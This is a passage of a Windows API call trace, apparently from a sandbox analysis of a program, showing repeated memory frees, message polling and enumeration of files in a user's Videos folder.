lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0096.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0096.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0096.305] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0096.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918c0 | out: hHeap=0x1780000) returned 1 [0096.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0096.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0096.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0096.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0096.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0096.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0096.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0096.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0096.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0096.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0096.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0096.306] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.307] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0096.307] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0096.307] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0096.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0096.308] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0096.308] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0096.308] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0096.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0096.308] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0096.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0096.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0096.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0096.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0096.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.309] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0096.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0096.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0096.309] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\*", lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe8501687, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe8501687, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9bc0, cFileName=".", cAlternateFileName="")) returned 0x41ac700 [0096.309] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe8501687, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe8501687, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9bc0, cFileName="..", cAlternateFileName="")) returned 1 [0096.309] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca44c10, ftCreationTime.dwHighDateTime=0x1d5e81e, ftLastAccessTime.dwLowDateTime=0x42d38240, ftLastAccessTime.dwHighDateTime=0x1d5e55b, ftLastWriteTime.dwLowDateTime=0x42d38240, ftLastWriteTime.dwHighDateTime=0x1d5e55b, nFileSizeHigh=0x0, nFileSizeLow=0xcc1f, dwReserved0=0x0, dwReserved1=0x43c9bc0, cFileName="-frmf8je.swf", cAlternateFileName="")) returned 1 [0096.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0096.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0096.310] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0096.310] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.310] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.310] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0096.310] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0096.311] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.311] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.311] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc4486a0, ftCreationTime.dwHighDateTime=0x1d5e22e, ftLastAccessTime.dwLowDateTime=0x933d7700, ftLastAccessTime.dwHighDateTime=0x1d5ef87, ftLastWriteTime.dwLowDateTime=0x933d7700, ftLastWriteTime.dwHighDateTime=0x1d5ef87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="96vXR96flJJML", cAlternateFileName="96VXR9~1")) returned 1 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.311] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0096.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.311] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0096.312] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.312] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.312] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0096.312] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.312] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.313] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 